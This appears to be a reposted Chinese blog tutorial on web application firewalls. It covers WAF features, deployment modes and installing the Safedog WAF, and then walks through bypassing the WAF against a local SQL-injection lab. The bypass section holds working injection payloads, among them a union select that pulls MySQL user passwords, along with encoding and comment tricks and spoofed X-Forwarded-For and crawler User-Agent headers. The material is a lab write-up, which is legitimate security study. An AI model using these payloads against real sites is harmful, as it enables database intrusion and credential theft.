网站是否含有seo收录功能,素材下载平台网站源码,南宁市网站开发建设,php网站优点网站WAF是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能等模块。能够为用户提供实时的网站安全防护避免各类针对网站的攻击所带来的危害。 一、WAF简介
WAF的全称是Web Application Firewall即Web应用防火墙简称WAF。 网站WAF是一款服务器安全防护软件是为IDC运营商、虚拟主机服务商、企业主机、服务器管理者等用户提供服务器安全防范的实用系统是集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。
常见的系统攻击分为两类
一是利用Web服务器的漏洞进行攻击如DDOS攻击、病毒木马破坏等攻击
二是利用网页自身的安全漏洞进行攻击如SQL注入攻击、跨站脚本攻击等。常见攻击方式对网站服务器带来的危害主要集中在病毒木马破坏、网页非法篡改、各类网络攻击带来的威胁。 二、WAF主要功能 网马木马主动防御及查杀
网页木马和网页挂马扫描工具采用特征码启发式引擎的查杀算法WEB木马检出率大于90%
流量监控
能够实时监测到每个网站的进出流量和总流量以及每个应用程序池及网站的CPU占用情况
网站漏洞防御功能
可拦截GET、POST、COOKIES等方式的SQL注入可对GET、POST、COOKIES分别定义特征码以及可拦截XSS注入等行为。
危险组件防护功能
全面拦截恶意代码对组件的调用权限拦截IIS执行恶意程序保护网站安全
.Net安全保护模块
快捷设置.Net安全模式禁止.Net执行系统敏感函数保障网站安全
双层防盗链链接模式 可以针对不同站点设置防盗链的过滤, 防止图片、桌面、软件、音乐、电影被人引用。如果发现请求者是盗用网站链接, 则自动重定向到错误处理页面
网站特定资源防下载
支持对doc、mdb、mdf、myd等特定资源的防下载保护加入要保护的敏感资料的路径即可防止敏感资料被下载
CC攻击防护
自主研发的独特抗攻击算法高效的主动防御系统可有效防御CC攻击、流量攻击。
网站流量保护
支持下载流量控制、下载线程控制。采用独创的线程控制和流量控制技术, 大大提高服务器性能, 保护网站流量。
IP黑白名单
全IP黑白名单功能允许用户设置个性化的IP信任列表直接屏蔽或者允许指定IP访问网站。同时增加iP临时黑名单功能以及实现了针对某个功能的iP白名单功能。同时爬虫白名单提供爬虫信任机制在出现误拦截情况下允许用户自定义爬虫信任。 三、WAF的多种部署模式了解
WAF一般支持透明代理反向代理旁路监控桥模式部署模式。
3.1、透明代理串接模式
透明代理串接模式是采用最多的部署模式防御效果好。
透明代理部署模式支持透明串接部署方式。串接在用户网络中可实现即插即用无需用户更改网络设备与服务器配置。部署简单易用应用于大部分用户网络中。 部署特点
不需要改变用户网络结构对于用户而言是透明的安全防护性能强故障恢复快可支持Bypass
3.2、旁路监控模式
采用旁路监听模式在交换机做服务器端口镜像将流量复制一份到WAF上部署时不影响在线业务。在旁路模式下WAF只会进行告警而不阻断。
3.3、反向代理模式
反向代理又分为两种模式反向代理代理模式与反向代理牵引模式。
3.3.1、代理模式 当外网去访问www.xxx.com时会解析到110.1.1.1。在网络防火墙FW上会通过nat-server技术将110.1.1.1外网地址解析为192.168.1.1的内网地址。而192.168.1.1为WAF的业务口地址WAF会去访问后端服务器192.168.1.100将包返回给WAFWAF再返回给用户起到了代理作用隐藏了真正的Web服务器地址。 部署特点
可旁路部署对于用户网络不透明防护能力强故障恢复时间慢不支持Bypass恢复时需要重新将域名或地址映射到原服务器。此模式应用于复杂环境中如设备无法直接串接的环境。访问时需要先访问WAF配置的业务口地址。支持VRRP主备
3.3.2、 牵引模式
WAF采用反向代理模式以旁路的方式接入到网络环境中需要在核心交换机上做策略路由PBR将客户端访问服务器的流量牵引到WAF上策略路由的下一跳地址为WAF的业务口地址。
部署特点:
可旁路部署对于用户网络不透明。故障恢复时间慢不支持Bypass恢复时需要删除路由器策略路由配置。此模式应用于复杂环境中如设备无法直接串接的环境。访问时仍访问网站服务器
3.4、透明桥模式
透明桥模式是真正意义上的纯透明不会改变更改数据包任何内容比如源端口、TCP序列号桥模式不跟踪TCP会话可支持路由不对称环境。 四、防火墙与waf区别**
简单来说
4.1、防火墙主要关注网络层的防护提供基础的访问控制。
4.2、WafWeb应用程序防火墙主要用于应用层防护识别并阻止针对Web应用的特定攻击如SQL注入、跨站脚本攻击等 五、市场Waf分类
5.1硬件Waf
绿盟、安恒、启明、知道创宇等
5.2软件Waf
安全狗、云锁、中间件自带的Waf模块等
5.3云WAF
阿里云、安全狗、知道创宇、安恒等 六、安全狗安装
软件waf安全狗安装步骤
运行cmdcd进入apache/bin文件夹目录
cd C:\phpStudy\Apache\bin 执行httpd.exe -k install -n apache2.4.39
httpd.exe -k install -n apache2.4.39 打开apache打开安全狗安装包进行安装 安装完成后点击安装安全狗插件 点击确认 安装过程不动任务管理器结束任务重启软件显示已安装。 然后注册登录正常使用 打开访问mysql靶场环境url填写插入sql注入语句
http://10.0.0.101:90/mysql/sql.php?id1 and 12 waf已生效。未生效重启phpstudy
注拦截规则库网站防护-漏洞防护设置里 七、WAF的检测方法
首先白名单黑名单身份认证--数据包解析--规则判断--拦截
八、Waf注入绕过方法
8.1、burp安装waf模块
云WAF绕过方法伪造XFF头为127.0.0.1或找出真实IP绕过
bp安装【Bypass WAF】插件配置插件 访问mysql靶场环境。bp抓包
http://10.0.0.101:90/mysql/sql.php?id1
放到重发器发送请求包请求包会自动添加127.0.0.1: 尝试url随机加空格进行绕过等 8.2、通过工具伪造百度、google等user agent头或者伪造白名单特殊目录
常用搜索引擎User-Agent头指纹信息;
百度User-Agent头
Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Google User-Agent头
Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) 360搜索User-Agent头
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 雅虎中国User-Agent头
“Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)”
搜狗User-Agent头
“Sogou web spider/4.0(http://www.sogou.com/docs/help/webmasters.htm#07)”
Internet Explorer 8User-Agent头
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
也可以用火狐浏览器获取User-Agent头 --------------------------
bp抓包批量替换为搜索引擎User_Agent头信息来实现绕过 8.3、WAF数据包解析阶段的绕过
1编码绕过
最常见的方法之一可以进行urlencode 如
http://10.0.0.101:90/mysql/sql.php?id1 11
url编码
http://10.0.0.101:90/mysql/sql.php?id1%20%26%26%2011
早期的方法现在效果不是太好 2修改请求方式绕过
因wsf默认检测url对get请求拦截cookie和post请求默认不开启利用这一特点修改请求方式绕过 3复参数绕过
例如一个请求是这样的
GET /pen/news.php?id1 union select user,password from mysql.user
可以修改为
GET pen/news.php?id1idunionidselectiduser,passwordidfrom%20mysql.user
很多WAF都可以这样绕测试最新版WAF能绕过部分语句
如
http://10.0.0.101:90/mysql/sql.php?id1 and 12
修改为
http://10.0.0.101:90/mysql/sql.php?id1id12 4WAF触发规则的绕过
WAF在这里主要是针对一些特殊的关键词或者用法进行检测。绕过方法很多也是最有效的。
绕过策略一特殊字符替换空格
用一些特殊字符代替空格比如在mysql中%0a是换行可以代替空格这个方法也可以部分绕过最新版本的WAF在sqlserver中可以用/**/代替空格也可以使用如下方法
如
http://10.0.0.101:90/mysql/sql.php?id1 and 11
修改为
http://10.0.0.101:90/mysql/sql.php?id1/*|%23--%23|*/and/*|%23--%23|*/-1-1
测试
http://10.0.0.101:90/mysql/sql.php?id1/*|%23--%23|*/and/*|%23--%23|*/-1-2 说明 /*|%23--%23|*/代替空格-1代替11被waf拦截 /|%23--%23|/ 的作用 这串字符是通过编码和特殊符号组合来尝试模拟空格或分隔符。在SQL语句中正常的空格会被用来分隔关键字和参数。但是当直接使用空格或被WAF识别的常见分隔符时可能会触发WAF的防护规则。因此攻击者使用/*开始一个多行注释接着是URL编码的%23代表##在SQL中用于开始单行注释最后再用*/尝试结束之前可能未闭合的注释形成一种混淆企图让WAF误判或忽略这部分内容。|字符在这里可能被用作自定义的分隔符尝试在某些情况下绕过规则。 -1代替1 这种替换是为了规避WAF对特定数值或模式的直接拦截。如果WAF被配置为阻止特定查询模式比如查询字符串中包含数字1可能被认为是潜在的攻击尝试例如在尝试枚举数据库时攻击者会尝试使用其他值或表达式来达到相同目的同时避免触发WAF的警报。使用-1-2这样的逻辑表达式目的是使整个条件始终为假它的真正意图是测试注入点的有效性而非执行有效的数据库查询。 -----------------
感谢您阅读至此更多精彩的内容将在下一篇文章中展开请继续关注。 声明
此文章只做技术研究谨遵守国家相关法律法规请勿用于违法用途如果您对文章内容有疑问可以尝试留言私信如有侵权请联系小编处理。
